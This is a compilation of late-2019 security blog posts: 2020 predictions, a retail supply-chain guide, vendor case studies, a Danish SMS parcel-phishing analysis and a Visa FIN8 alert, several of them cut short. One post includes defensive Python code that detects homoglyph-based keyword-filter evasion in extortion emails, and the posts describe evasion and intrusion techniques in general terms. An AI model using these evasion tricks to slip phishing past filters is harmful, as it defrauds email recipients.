12 days of Christmas Security Predictions: What lies ahead in 2020

Marked by a shortage of cyber security talent and attackers willing to exploit any vulnerability to achieve their aims, this year emphasised the need for organisations to invest in security and understand their risk posture. With the number of vendors in the cyber security market rapidly growing, rising standard for managing identities and access, and organisations investing more in security tools, 2020 will be a transformational year for the sector.

According to Rob Norris, VP Head of Enterprise & Cyber Security EMEIA at Fujitsu: “We anticipate that 2020 will be a positive year for security, and encourage the public and private sectors to work together to bring more talent to the sector and raise the industry standards. As the threat landscape continues to expand with phishing and ransomware still popular, so will the security tools, leaving organisations with a variety of solutions. Next year will also be marked by a rush to create an Artificial Intelligence silver-bullet for cyber security and a move from old-fashioned password management practices to password-less technologies.”

“As cyber criminals continue to find new ways to strike, we’ll be working hard to help our customers across the world to prepare their people, processes and technology to deal with these threats. One thing to always keep in mind is that technology alone cannot stop a breach - this requires a cultural shift to educate employees across organisations about data and security governance. After all, people are always at the front line of a cyber-attack.”

What will 2020 bring with Cybersecurity?

In light of this, Rob Norris shares his “12 Days of Christmas” security predictions for the coming year.

1. A United front for Cyber Security Talent Development
The shortage of cyber security talent will only get worse in 2020 - if we allow it to.

The scarce talent pool of cyber security specialists has become a real problem with various reports estimating a global shortage of 3.5 million unfulfilled positions by 2021. New approaches to talent creation need to be considered.

The government, academia, law enforcement and businesses all have a part to play in talent identification and development and will need to work collaboratively to provide different pathways for students who may not ordinarily be suited to the traditional education route. Institutions offering new cyber security courses for technically gifted individuals are a great starting point, but more will need to be done in 2020 if the shortage is to be reduced.

2. Cloud Adoption Expands the Unknown Threat Landscape 
It will take time for organisations to understand their risk posture as the adoption of cloud services grows.

While the transition to cloud-based services will provide many operational, business and commercial benefits to organisations, many CISOs will be working to understand the risks to their business from new data flows, data storage and new services. The boundaries and control of services in traditional networks are typically very well understood, while the velocity and momentum of cloud adoption leaves CISOs with unanswered questions. Valid concerns remain around container security, cloud storage, cloud sharing applications, identity theft and vulnerabilities yet to be understood, or exposed.

3. The Brexit Effect 
Brexit will have far-reaching cyber security implications for many organisations, in many countries.

The UK and European markets are suffering from uncertainty around the UK’s departure from the European Union, which will affect the adoption of cyber security services, as organisations will be reticent to spend until the impact of Brexit is fully understood.

The implications of data residency legislation, hosting, corporation tax, EU-UK security collaboration and information sharing are all questions that will need to be answered in 2020 post-Brexit. There is a long-standing collaborative relationship between the UK and its EU counterparts including European CERTs and Europol and whilst the dynamics of those working relationships should continue, CISOs and senior security personnel will be watching closely to observe the real impact.

4. SOAR Revolution 
Security Orchestration, Automation and Response (SOAR) is a real game-changer for cyber security and early adopters will see the benefits in 2020 as the threat landscape continues to expand.

Threat intelligence is a domain that has taken a while for organisations to understand in terms of terminology and real business benefits. SOAR is another domain that will take time to be understood and adopted, but the business benefits are also tangible. At a granular level, the correct adoption of SOAR will help organisations map, understand and improve their business processes. By making correct use of their technology stack and associated APIs, early adopters will get faster and enhanced reporting and will improve their security posture through the reduction of the Mean Time To Respond (MTTR) to threats that could impact their reputation, operations and bottom line.

5. Further Market Fragmentation will Frustrate CISOs 
The number of vendors in the cyber security market has been rapidly growing and that will continue in 2020, but this is leading to confusion for organisations.

The cyber security market is an increasingly saturated one, often to the frustration of CISOs who are frequently asked to evaluate new products. Providers that can offer a combined set of cyber security services that deliver clear business outcomes will gain traction, as they can offer benefits over the use of disparate security technologies: less contract management, discounts provisioned across services, a single point of contact and fewer services and technologies to manage.

Providers that continue to acquire security technologies to enhance their stack such as Endpoint Detection and Response (EDR) or technology analytics, will be best positioned to provide the full Managed Detection and Response (MDR) services that organisations need.

6. Artificial Intelligence (AI) will need Real Security 
2020 will see a rise in the use of adversarial attacks to exploit vulnerabilities in AI systems.

There is a rush to create an AI silver bullet for cyber security; however, there is currently a lack of focus on security for AI. It is likely we will see a shift towards this research area, as “adversarial” approaches to neural networks could potentially divulge partial or complete data points that the model was trained on. It is also possible to extract parts of a model, leading to intellectual property theft, as well as to craft “adversarial” inputs which manipulate the intended model. Currently, it is hard to detect and remediate these attacks.

There will need to be more focus on explainable AI, which would allow for response and remediation on what are currently black-box models.

7. Organisations will need to Understand how to make better use of Security Tools and Controls at their Disposal 
Customers will need to take better advantage of the security measures that they already have available. 

The well-established cloud platforms already contain many integrated security features but organisations are failing to take advantage of these features, partly because they do not know about them. A greater understanding of these features will allow organisations to make smarter investment decisions and we expect to see a growing demand for advice and services that allow organisations to optimally configure and monitor those technologies to ensure they have minimal risk and exposure to threats.

Fujitsu predicted last year that securing multi-cloud environments will be key going forward and organisations continue to need to find a balance of native and third-party tools to drive the right solution for their objectives.

8. Do you WannaCry again? 
The end of support for Windows Server 2008 and Windows 7 will open the door for well-prepared attackers.

January 2020 sees the official end of support life for all variants of Windows Server 2008 and Windows 7, which share elements of the same code base. This means that both end-user devices and data center servers will be equally vulnerable to the same exploits and opens the possibility that organisations could be susceptible to attacks that cause large outages.

In 2017, WannaCry surfaced and caused some well-publicised outages at well-known organisations from across the healthcare, manufacturing, logistics and aerospace industries. Microsoft had released patches two months before and recommended using a later version of the impacted components. We also learned in 2017, via Edward Snowden, that nation-states have built up an armoury of previously undisclosed exploits. These exploits are documented to target the majority of publicly available operating systems and so it stands to reason that cyber criminals could have also built a war chest of tools which will surface once the end of vendor support has passed for these operating systems.

9. Raising the Standard for Managing Identities and Access
Federated Authentication, Single Sign-On and Adaptive Multi-Factor will become standard, if not required, practices in 2020.

2020 will see organisations continuing their adoption of hybrid and multi-cloud infrastructures and a ‘cloud-first’ attitude for applications. This creates the challenge of managing the expanding bundle of associated identities and credentials across the organisation.

Identities and associated credentials are the key attack vector in a data breach - they are the ‘keys to the kingdom’. Without sufficient controls, especially for those with privileged rights, it is becoming increasingly difficult for organisations to securely manage identities and mitigate the risk of a data breach. Capabilities such as Federated Authentication, Single Sign-On and Adaptive Multi-Factor address the challenge of balancing security and usability, and we see this becoming standard, if not required, practice in 2020.

10. Extortion Phishing on the Rise 
Taboo lures and enhanced phishing and social engineering techniques will prey on user privacy.

We are seeing an increase in a form of phishing that would have a recipient believe their potentially embarrassing web browsing and private activity has been observed with spyware and will be made public unless a large ransom is paid.

Since their widespread emergence last year, the techniques used by these extortionists to evade filters continue to develop. Simple text-only emails from single addresses now come from ‘burnable’ single-use domains. Glyphs from the Cyrillic, Greek, Armenian and extended Latin alphabets are being used to substitute letters in the email to bypass keyword filters and Bitcoin wallets are rotated often and used to associate a recipient with a payment.

The psychological tricks used in the wording of these emails will develop and likely aid their continued success.
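The glyph-substitution trick above defeats a keyword filter only if the filter compares raw characters. The following is an added example (not Fujitsu's code) of a homoglyph-aware filter: it folds confusable Cyrillic, Greek, Armenian and extended-Latin letters back to ASCII before matching, and separately flags words that mix scripts, which is itself a strong signal. The confusables table is a small hand-picked subset (a production filter would use the full Unicode confusables data), and the keyword list and sample email are constructed for the example.

```python
"""Homoglyph-aware keyword matching for extortion-style phishing (constructed example)."""
import unicodedata

# Hand-picked subset of look-alike letters, keyed by code point so the mapping is
# unambiguous in source. Assumption: enough to illustrate the technique.
CONFUSABLES = {
    # Cyrillic
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0455": "s", "\u0458": "j",
    "\u04bb": "h", "\u0501": "d", "\u051b": "q", "\u051d": "w",
    # Greek
    "\u03b1": "a", "\u03bf": "o", "\u03bd": "v", "\u03c1": "p", "\u03c4": "t", "\u03ba": "k",
    # Armenian
    "\u0578": "n", "\u057d": "u", "\u0585": "o", "\u0581": "g",
    # Extended Latin
    "\u0251": "a", "\u0131": "i", "\u0261": "g",
}

# Constructed keyword list a mail filter might carry for this campaign type.
KEYWORDS = ("bitcoin", "wallet", "webcam", "your password")


def normalize(text):
    """NFKC first (fullwidth forms, ligatures), then fold confusables, then lowercase."""
    text = unicodedata.normalize("NFKC", text)
    return "".join(CONFUSABLES.get(ch, ch) for ch in text).lower()


def mixed_script_words(text):
    """Words whose letters come from more than one script, judged by the first
    word of each character's Unicode name (LATIN, CYRILLIC, GREEK, ...)."""
    flagged = []
    for word in text.split():
        scripts = {unicodedata.name(ch, "?").split()[0] for ch in word if ch.isalpha()}
        scripts.discard("?")
        if len(scripts) > 1:
            flagged.append(word)
    return flagged


def score_email(subject, body):
    """Compare a naive raw-text match with the normalized match and report evasion."""
    text = subject + " " + body
    raw_hits = [k for k in KEYWORDS if k in text.lower()]
    normalized_hits = [k for k in KEYWORDS if k in normalize(text)]
    mixed = mixed_script_words(text)
    return {
        "raw_hits": raw_hits,
        "normalized_hits": normalized_hits,
        "mixed_script_words": mixed,
        "suspicious": bool(normalized_hits),
        # Evasion: normalization revealed keywords the raw match missed, or scripts are mixed.
        "evasion": len(normalized_hits) > len(raw_hits) or bool(mixed),
    }


# Constructed sample: Cyrillic о, і, а and е substituted into English words.
SAMPLE_SUBJECT = "Y\u043eur acc\u043eunt was hacked"
SAMPLE_BODY = ("Send 0.2 B\u0456tcoin to w\u0430llet 1ExampleAddrNotReal within 48 hours "
               "or the w\u0435bcam video goes public.")


if __name__ == "__main__":
    result = score_email(SAMPLE_SUBJECT, SAMPLE_BODY)
    print("raw keyword hits:       ", result["raw_hits"])
    print("normalized keyword hits:", result["normalized_hits"])
    print("mixed-script words:     ", result["mixed_script_words"])
```

Run against the sample, the raw match finds nothing while the normalized match finds three keywords, and five words are flagged for mixing Latin and Cyrillic letters; the mixed-script check is worth keeping even when the confusables table is incomplete, because it needs no table at all.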

11. Passwords become a Thing of the Past 
We will see increasing adoption of end-to-end password-less access, especially in scenarios where Privileged Access Management (PAM) is required.

Next year we will see a move from old-fashioned password management practices to password-less technologies. The increasing number of cases where privileged credentials and passwords are required, but are painful to manage in a secure and cost-effective way, will drive this shift. Passwords are easy to forget, and the increasing complexity requirements placed upon users increase the chances of passwords having to be written down – which is self-defeating. Biometric technologies and ephemeral certificates will provide a more secure and user-friendly way to manage credentials and ensure assets and data are kept secure.

12. Ransomware not so Random
As more organisations employ negotiators to work with threat actors, ransomware is likely to decrease next year.

In 2019, we observed a shift in the way certain ransomware ransom notes were constructed. Traditionally, ransomware notes are generic template text informing the victim that their files are encrypted and that they must pay a set amount of Bitcoin in order to have their files unencrypted.

When threat actors successfully deploy ransomware network-wide and achieve other deployment objectives, they inform their victims their files are encrypted. Crucially, however, they do not reveal the price they demand for their decryption. Instead, threat actors seek to open a dialogue with the victim to discuss a price. This change has seen organisations employ negotiators to work with threat actors on managing and, hopefully, reducing the demand and we expect this to continue in 2020.

How the Cyber Grinch Stole Christmas: Managing Retailer Supply Chain Cyber Risk

Cyber threats are always a prominent risk to businesses, especially those operating with high quantities of customer information in the retail space: over 50% of global retailers were breached last year. BitSight VP Jake Olcott has written guidance for retailers on how to manage their supply-chain cyber risk, in four simple steps, to help prevent the 'Cyber Grinch' from stealing not just Christmas but the rest of the year as well.

Cyber risk in retail is not a new concept. Retail is one of the most targeted industries when it comes to cyber-attacks. In fact, over 50% of global retailers were breached in the last year. Given the sensitive customer data these organizations often possess — like credit card information and personally identifiable information (PII) – it’s not surprising that attackers have been capitalizing on the industry for decades.

The Christmas shopping season can increase retailers’ cyber risk, with bad actors looking to take advantage of the massive surge of in-store and online shoppers that comes with it. What is important for retailers to keep in mind is that it’s not only their own network they have to worry about when it comes to mitigating cyber risk, but their entire supply chain ecosystem – from shipping distributors and production partners to point-of-sale technologies and beyond.

Take for example the infamous 2017 NotPetya attack that targeted large electric utilities, but actually ended up stalling operations for many retailers as a result. This nation-state attack had a snowball effect, wreaking havoc on shipping companies like FedEx and Maersk who are responsible for delivering many retail orders. FedEx operations were reduced to manual processes for pick-up, sort and delivery, and Maersk saw infections in part of its corporate network that paralyzed some systems in its container business and prevented retail customers from booking ships and receiving quotes.

For retailers, a cyber disruption in the supply chain can fundamentally disrupt operations, causing catastrophic harm to brand reputation, financial performance and regulatory repercussions – and the stakes are even higher during the make-or-break holiday sales period.

Here are some important steps they can take now to mitigate supply chain cyber risk this holiday season and beyond.
Step 1: Inventory your Supply Chain
A business today relies on an average of 89 vendors a week that have access to its network in order to perform various crucial business functions. As outsourcing and cloud adoption continue to rise across retail organizations, it is critical that they keep an up-to-date catalogue of every third party and service provider in the digital (or brick-and-mortar) supply chain and their network access points. These supply chain ecosystems can be massive, but previous examples have taught us that security issues impacting any individual organization can potentially disrupt the broader system.

An inventory of vendors and the systems they have access to allows security teams to keep track of all possible paths a cybercriminal may exploit and can help them better identify vulnerabilities and improve response time in the event of an incident.

Step 2: Take control of your Third-Party Accounts
Once you have a firm grasp of the supply chain, a critical focus should be to identify and manage any network accounts held by these organizations. While some suppliers may need access to complete their daily tasks, this shouldn’t mean handing them a full set of keys to the kingdom on their terms.

Retailers should ensure each vendor has an email account and credentials affiliated and managed by the retailer – not by the supplier organization and certainly not the user themselves. By taking this step, the retailer can ensure they are the first point of notification if and when an incident occurs and are in full control over the remediation process.

Step 3: Assess your Suppliers’ Security Posture
Retail security teams often conduct regular internal audits to evaluate their own security posture but fail to do so effectively when it comes to their supply chain relationships.

While a supplier’s security posture doesn’t necessarily indicate that their products and services contain security flaws, in the cyber world, where there’s smoke, there’s eventually fire. Poor security performance can be indicative of bad habits that could lead to increased vulnerability and risk exposure.

Having clear visibility into supplier security performance can help retailers quickly pinpoint security vulnerabilities and cyber incidents, while significantly speeding up communication and action to address the security concern at hand.

Step 4: Continuously Monitor for Changes
Third-party security performance assessment should not be treated as a one-and-done item on the supply chain management checklist.

The cyber threat landscape is volatile and ever-evolving, with new vulnerabilities and attack vectors cropping up virtually every day. That means retailers need solutions and strategies in place that provide a real-time, continuous and measurable pulse check of supplier security posture to ensure they are on top of potential threats before they impact the business and its customers.

Just as retailers track billions of packages and shipments in real-time to ensure there are no mistakes or bumps in the road, their vendor risk management program should be treated with the same due care.

This holiday season and beyond, it is critical that retailers invest in supply chain security management to reduce the risk of data breaches, slowdowns, and outages – and the costs and reputational damage that come along with them. After all, retailers are only as secure as their weakest third party.

70% of Organizations Experienced Internal Data Breaches in the Last Five Years

Internal data breaches are on the rise, with 70% of security professionals reporting that it’s happened to them in the last five years.

According to a survey conducted by email security company Egress, accidental internal breaches are one of the top three concerns for IT security decision makers along with external hacks and malware.

Among the other findings in the report, fewer than 40% (39.6%) of organizations train employees in cybersecurity best practices and data hygiene, and 26% of respondents did not use encryption when transmitting data externally.

While e-mail applications are a leading cause of accidental breaches, file sharing services, collaboration tools, and SMS apps represent significant risks.

Respondents did indicate a new urgency with regard to compliance with privacy- and security-centric regulations such as the European Union’s General Data Protection Regulation and the pending California Consumer Privacy Act.

The post 70% of Organizations Experienced Internal Data Breaches in the Last Five Years appeared first on Adam Levin.

Mobile threat defense and intelligence are a core part of cyber defense

The modern workplace is a mobile workplace. Today’s organizations rely on mobility to increase productivity and improve the customer experience. But the proliferation of smartphones and other mobile devices has also expanded the attack surface: there are roughly 5 billion mobile devices in the world, many of them used to handle sensitive corporate data. To safeguard company assets, organizations need to augment their global cyber defense strategy with mobile threat intelligence.

When handled and analyzed properly, actionable data holds the key to enabling solid, 360-degree cybersecurity strategies and responses. However, many corporations lack effective tools to collect, analyze, and act on the massive volume of security events that arise daily across their mobile fleet. An international bank recently faced this challenge. By deploying Pradeo Security alongside Microsoft Endpoint Manager and Microsoft Defender Advanced Threat Protection (ATP), the bank was able to harness its mobile data and better protect the company.

Pradeo Security strengthens Microsoft Endpoint Manager Conditional Access policies

In 2017, the Chief Information Security Officer (CISO) of an international bank recognized that the company needed to address the risk of data exposure on mobile. Cybercriminals exploit smartphones at the application, network, and OS levels, and infiltrate them through mobile applications 78 percent of the time [1]. The General Data Protection Regulation (GDPR) was also scheduled to go into effect the following year. The company needed to better secure its mobile data to safeguard the company and comply with the new privacy regulations.

The company deployed Microsoft Endpoint Manager to gain visibility into the mobile devices accessing corporate resources. Microsoft Endpoint Manager is the recently announced convergence of Microsoft Intune and Configuration Manager functionality and data, plus new intelligent actions, offering seamless, unified endpoint management. Then, to ensure the protection of these corporate resources, the company deployed Pradeo Security Mobile Threat Defense, which is integrated with Microsoft.

Pradeo Security and Microsoft Endpoint Manager work together to apply conditional access policies to each mobile session. Conditional access policies allow the security team to automate access based on the circumstances. For example, if a user tries to gain access using a device that is not managed by Microsoft Endpoint Manager, the user may be forced to enroll the device. Pradeo Security enhances Microsoft Endpoint Manager’s capabilities by providing a clear security status of any mobile devices accessing corporate data, which Microsoft can evaluate for risk. If a smartphone is identified as non-compliant based on the data that Pradeo provides, conditional access policies can be applied.

For example, if the risk is high, the bank could set policies that block access. The highly granular and customizable security policies offered by Pradeo Security gave the CISO more confidence that the mobile fleet was better protected against threats specifically targeting his industry.

Get more details about Pradeo Security for Microsoft Endpoint Manager in this datasheet.

Detect and respond to advanced cyberthreats with Pradeo Security and Microsoft Defender ATP

The bank also connected Pradeo Security to Microsoft Defender ATP in order to automatically feed it with always current mobile security inputs. Microsoft Defender ATP helps enterprises prevent, detect, investigate, and respond to advanced cyberthreats. Pradeo Security enriches Microsoft Defender ATP with mobile security intelligence. Immediately, the bank was able to see information on the latest threats targeting their mobile fleet. Only a few weeks later, there was enough data in the Microsoft platform to draw trends and get a clear understanding of the company’s mobile threat environment.

Pradeo relies on a network of millions of devices (iOS and Android) across the globe to collect security events related to the most current mobile threats. Pradeo leverages machine learning mechanisms to distill and classify billions of raw and anonymous security facts into actionable mobile threat intelligence.

Today, this bank’s mobile ecosystem entirely relies on Pradeo and Microsoft, as its security team finds it to be the most cost-effective combination when it comes to mobile device management, protection, and intelligence.

About Pradeo

Pradeo is a global leader of mobile security and a member of the Microsoft Intelligent Security Association (MISA). It offers services to protect the data handled on mobile devices and applications, and tools to collect, process, and get value out of mobile security events.

Pradeo’s cutting-edge technology has been recognized as one of the most advanced mobile security technologies by Gartner, IDC, and Frost & Sullivan. It provides a reliable detection of mobile threats to prevent breaches and reinforce compliance with data privacy regulations.

For more details, contact Pradeo.

Note: Users must be entitled separately to Pradeo and Microsoft licenses as appropriate.

Learn more

To learn more about MISA, visit the MISA webpage. Also, bookmark the Security blog to keep up with our expert coverage on security matters and follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


[1] 2019 Mobile Security Report, Pradeo Lab

The post Mobile threat defense and intelligence are a core part of cyber defense appeared first on Microsoft Security.

SECURITY ALERT: New Denmark Phishing Campaign Uses Package Sending Notification as Pretext

A new phishing campaign disguised as package notification is on the rampage. Initially discovered in Denmark, the malicious venture notifies users that they are expecting a package delivery.

The phishing attempt came to light when a Denmark cell user received the following SMS:

phone screen with phishing attempt

The message reads: “We were unable to deliver your package DK-XXXXXX as it had been shipped with too little postage. Pay the shipping fee now to have your package delivered.” Right beneath the message is a link (domain sanitized by Heimdal Security) that presumably redirects the user to the package center.

However, right before the browser lands on the package center’s search page, it is routed via another domain (domain sanitized and blocked by Heimdal Security) before reaching the website.

The link takes the user to a package search page (see the picture below).

package search page

At this point, the user is prompted to search for the package number. The text above reads: “Quick and easy. Write your parcel number below. Search after shipping ID, address, postcode, etc.” Once the user enters the parcel number quoted in the SMS and presses the “Search” button, he is redirected to the following screen:

screen with delivery status

The message reads: “Your package is on its way. Status: not sent from the Distribution Center – stopped in X post office, failing payment of 20 Danish crowns ($3). The package will be shipped when the fee is paid.” Motivated to pay the remaining postage fee, the user presses the “BETAL NU” (Pay now) button. Once again, the browser redirects the user to another website (domain sanitized and blocked by Heimdal Security).

The DK appendage is just a bounce. Price Live, the root domain, which is listed under a United States IP, is not under CloudFlare’s protection and is therefore more visible in the wild. The root domain has also been sanitized and blocked by Heimdal Security.

Price Live’s payment processing page was specifically engineered to mimic a legitimate page. Notice in the picture below the trust marks included to reinforce the illusion: a Norton Secured badge, an SSL encryption certificate, PCI compliance, Verified by Visa and MasterCard SecureCode, and supported payment methods such as Visa, Visa Electron, MasterCard and Maestro.

phishing page credentials

Private info fields have also been added. To send the order through, which in this case is the additional postage fee, the user must fill in his first and last name, physical address, ZIP Code, city of residence, mobile number, and email address.

phishing page personal data fields


The mimicry is very difficult to detect at first glance. However, the message at the bottom of the page, conveniently accompanied by a pre-checked box, tells another story. The message reads:

By clicking Next, you will automatically agree to our Terms of Use. Our data policy tells you how we collect, use, and share your information. Subsequently, our cookie policy explains how we use cookies and similar technologies. is a product based on an automatic subscription of 39.99 euros and AUTOMATIC RENEWED at the end of the three-day trial period unless it expires before the beginning of the three-day trial period when it will be canceled.

In essence, the phishing campaign works like this: having received an SMS, the user clicks the appended link to verify the status of the package. A brief search reveals that the delivery has been held back on account of insufficient postage. The user is then redirected to another website where he can pay the due fee. There are two foreseeable outcomes:

1) The user fills out the fields and leaves the box checked.

The data goes directly to the malicious actor who engineered the page. Twenty Danish crowns will be deducted from the bank account. Financial data will also be exposed. The user will also be subscribed to the product. At the end of the three-day trial period, 39.99 euros will be deducted from the bank account. Auto-renewal will kick in every three days, posting similar payouts. There’s no visible way of canceling the subscription.

2) The user fills out the fields and unchecks the box.

Personal data gets stolen. Twenty Danish crowns will be deducted from the account. Financial info will be exposed. Enter2Gain subscription will not be possible.

Forensic Analysis of end domain

Domain forensics reveal that Price Live was created on the 10th of December 2019 in the UK, under the registrar Tucows Domains Inc. It has two CloudFlare name servers, each serving approximately 21 million domains. IP address analysis points to Fasthosts Internet Limited as the ISP. The IP change history shows 10 changes across 10 unique addresses during the last 5 years. Registrar status: client transfer and client update are both prohibited. Furthermore, the registrant is listed as REDACTED FOR PRIVACY.

How to stay safe from the new Nordic phishing campaign

1. Refrain from clicking on any links enclosed in SMSs/emails

The most common phishing method is to include ‘spiked’ links inside an SMS or email. Such a link redirects you to a fake form whose contents are transmitted to a malicious actor instead of a legitimate data processing unit. Bear in mind that vendors will not ask you to fill in passwords, email addresses, names, or financial details via email.

2. Get in touch with your parcel shipping company

If, by chance, you come across a message informing you that your order cannot be delivered for one reason or another, the best way of establishing its legitimacy is to get in touch with your shipping company. Request details about the ETA, any due fees and any hold-ups. Most shipping companies include the courier’s cell number. Give him or her a call and inquire about the status. If your parcel is due to arrive via the postal service, head to the nearest office and make inquiries. Don’t forget to bring along any paperwork or data regarding your delivery.

3. Anti-phishing protection

Against phishing attempts, an antivirus isn’t enough to ensure complete protection. Most requests are hijacked at the DNS level, something a traditional antivirus can’t pick up. Thor Foresight Home, our flagship threat prevention system, can filter out traffic at the DNS level and root out any phishing attempts. In addition, it can sever the connection to malicious command & control servers, rendering them useless.



The latest phishing campaign proves that malicious actors have resorted to twisted guerilla marketing techniques in order to maximize the damage and increase efficiency. Be on your guard, refrain from clicking on suspicious links, get confirmation from your shipping agency, and use an adequate antimalware solution.

The post SECURITY ALERT: New Denmark Phishing Campaign Uses Package Sending Notification as Pretext appeared first on Heimdal Security Blog.

Drupal Warns Web Admins to Update CMS Sites to Patch a Critical Flaw

If you haven't recently updated your Drupal-based blog or business website to the latest available versions, it's time. Drupal development team yesterday released important security updates for its widely used open-source content management software that address a critical and three "moderately critical" vulnerabilities in its core system. Considering that Drupal-powered websites are

Top 5 Essential Features of Effective Cybersecurity for Web Apps

There's hardly any business nowadays that doesn't use computers and connect to the Internet. Companies maintain an online presence through their official websites, blogs, and social media pages. People use online services to conduct day-to-day activities like banking. And of course, there are many businesses that are completely based on the web like online markets, e-Commerce websites and

British Hacker Accused of Blackmailing Healthcare Firms Extradited to U.S.

A British man suspected to be a member of 'The Dark Overlord,' an infamous international hacking group, has finally been extradited to the United States after being held for over two years in the United Kingdom. Nathan Francis Wyatt, 39, appeared in federal court in St. Louis, Missouri, on Wednesday to face charges related to his role in hacking healthcare and accounting companies in the U.S.

Visa Warns About Hackers Stealing Gas Pumps Credit Card Data

Payment processing company Visa reported that attackers are intercepting credit card data from gas pump point-of-sale networks, which are becoming increasingly attractive targets for cybercrime organizations because they often lack adequate security software.

Visa said its Payment Fraud Disruption (PFD) team detected three separate threats targeting retailers’ point-of-sale (POS) networks, believed to have been carried out by advanced cybercrime organizations in the summer of 2019. Two of the attacks targeted North American fuel dispenser merchants’ POS systems.

Forensic analysis of the targeted networks, according to Visa, suggested that the attacks on the fuel dispenser merchants could be attributed to a cybercrime group known as FIN8.

The firm indicated that since at least 2016, FIN8 has been an aggressive hacking group that often targets retail, hotel, and hospitality merchants’ POS environments to steal payment account data.

Visa’s security alert said the hackers first gained access to the fuel dispenser merchants’ POS networks through phishing emails carrying malicious links that gave them network access once clicked. They then carried out reconnaissance of the corporate network, obtained credentials and used them to move laterally to the POS system. Once they had breached the POS networks, the attackers deployed POS scraping malware to capture payment card data.

The scraping malware inserted into the POS networks seems to have specifically targeted magnetic stripe cards, according to Visa. Thus, the payment cards used at non-chip fuel pumps on those POS networks were at risk, as the hackers exploited the lack of security of the magnetic stripe.

The attacks did not appear to affect the more secure chip-and-PIN fuel pump transactions.

Visa announced earlier this year that by October 2020, fuel dispenser merchants will have to install chip-and-PIN readers. After that date, liability for any card fraud found will shift to the service stations.

The post Visa Warns About Hackers Stealing Gas Pumps Credit Card Data appeared first on .

What are the different techniques of intruding networks?

Estimated reading time: 2 minutes

Network performance is the key indicator of an enterprise’s productivity and health in these connected times. It is the prerequisite of every business enterprise to maintain a smooth network workflow; however, that is easier said than done. Enterprise networks are susceptible to unauthorized activities in the form of targeted intrusions through vulnerabilities and backdoors.

When such vulnerabilities are exploited, unsolicited access to the network occurs, which can have a range of unpleasant consequences for businesses. These intrusions can have harmful effects on business health, ranging from high utilization of resources to loss of enterprise data.

Cybersecurity teams deployed by enterprises are required to proactively detect and respond to network intrusions. It is imperative that these teams have a detailed understanding of how network intrusions and other types of attacks occur so that detection and prevention systems can be set up with the same in mind.

This understanding begins with identifying the type of attack vector. Network intrusions happen through a variety of techniques some of which are –

Asymmetric Routing

In this type of method, intrusions happen via various routes to the target device. To avoid detection, the intrusive packets bypass sensors to reach their target.

Taking advantage of vulnerabilities in networks

In many cases, networks are infiltrated through existing software, with attackers either taking advantage of vulnerabilities or using stolen credentials. Since most enterprises rely on standard operating systems and other widely used software, attackers can use these as vectors for infiltration.

Common Gateway Interface (CGI) scripts

Infiltrators can use Common Gateway Interface (CGI) scripts to access network files. CGI scripts are used to support connections between servers and clients on the Web, but attackers can manipulate scripts that lack input verification to access files not meant for the Web.

Protocol Specific Attacks

Devices using common network protocols like TCP, ARP, IP, UDP, ICMP etc. can leave backdoors open for intrusions, e.g. man-in-the-middle attacks.

Network intrusions can commonly be covered up by their controllers to ensure that enterprises are unable to detect them. Attackers use various techniques such as deleting access logs, encrypting stolen data or installing rootkits to ensure cybersecurity teams are unable to detect their activities.

The most effective way for enterprises to prevent and act against network intrusions is to employ an Intrusion Prevention/Detection System. An Intrusion Detection System (IDS) monitors all incoming and outgoing network activity and identifies any signs of intrusion in systems that could jeopardize the business. An Intrusion Prevention System (IPS) is a step ahead of an IDS in its capabilities: it detects and blocks anomalies on a company’s network. An IPS is an active control mechanism that monitors the network traffic flow. It identifies and averts vulnerability exploits in the form of malicious inputs that intruders use to interrupt and gain control of an application or system.

Benefits of Seqrite’s UTM solution

Seqrite’s Unified Threat Management (UTM) offers a one-stop solution for all enterprise security needs which includes intrusion detection and prevention as a standard feature.

UTM’s in-built IDS and IPS components keep enterprises safe by:

  • Monitoring, evaluating and catching threats in real-time
  • Preventing Denial of Service (DoS)/Distributed Denial of Service (DDoS) attacks
  • Preventing the discovery of open ports by attackers

Seqrite UTM’s IPS acts as a security barrier against unwanted intrusions into enterprise networks and forestalls a broad range of DoS and DDoS attacks before they penetrate the network.

The post What are the different techniques of intruding networks? appeared first on Seqrite Blog.

‘Twas the Week Before Hackmas

Dakota Nelson //
‘Twas the week before Hackmas
And all through their houses
Not a tester was working
Nor moving their mouses
The findings were listed in reports with care
In hopes that bugfixes would soon be there
The hackers were nestled all snug in their chairs
While bitstreams of 0day flowed through twisted pairs
And Heather on her treadmill desk, […]

The post ‘Twas the Week Before Hackmas appeared first on Black Hills Information Security.

4 Reasons You Need Native Linux Virus Scanning

In today’s connected environments, Linux IT professionals can no longer claim that viruses are only a Windows threat.

The biggest excuse people make for forgoing virus protection is that they scan their client PCs and therefore no virus would make it to the server. However, effective malware defense requires multiple layers. This brings us to the importance of native virus scanning.

The following infographic highlights the four main reasons security experts give for using antivirus software that runs natively on your Linux system.

1. PC-Based Virus Scanning Creates Security Concerns

Scanning a Linux server from a PC creates security vulnerabilities. The process requires a workstation to remain logged on to the server throughout the scan, which compromises the security and integrity of the server and leaves it visible to a virus or malicious code.

Native virus scanning doesn’t require a workstation or a file share.

2. PC Scanning Isn’t Very Reliable

Some parts of Linux servers are impossible for a PC-based anti-virus solution to scan and can cause non-native scans to fail, making for an incomplete and time-consuming process.

Native anti-virus solutions can automatically remove all detected threats with no additional hardware.

3. Native Antivirus Scanning Eliminates Stability Problems

A number of problems with PC-based scanning solutions, such as a lost connection to the server or a pop-up warning message, cause the scanning process to stop entirely.

Stability concerns simply aren’t an issue with native software.

4. Virus Scanning from a PC Creates Performance Problems

PC-based scanning is incredibly slow and increases the network load dramatically.

A native scanning program performs much faster, doesn’t increase the network load, doesn’t reset a file’s “last access time,” and allows for more frequent scanning.

Most organizations are running some version of Linux, making it a prime target for malicious attackers to exploit. Additionally, Linux systems can also serve as hosts to Windows viruses. Native antivirus software provides server-level virus protection that detects and removes native Linux viruses, infected files, and Windows malware lurking on your Linux servers.

Take these threats seriously with a solution that offers battle-tested technology, advanced heuristic analysis, and detection, quarantine and cleaning. Powertech Antivirus offers the power and protection of the industry leading scan engines while supporting the specific features of your operating system.

Ready to take the next step?

To see exactly what a native antivirus program could do for your organization, sign up now for a free trial of Powertech Antivirus.

Cybersecurity Predictions for 2020: What Our Experts Have to Say

Reading Time: ~ 3 min.

As the year draws to a close, the cybersecurity analysts at Webroot and Carbonite pull out their crystal balls to make their predictions for the year ahead. 

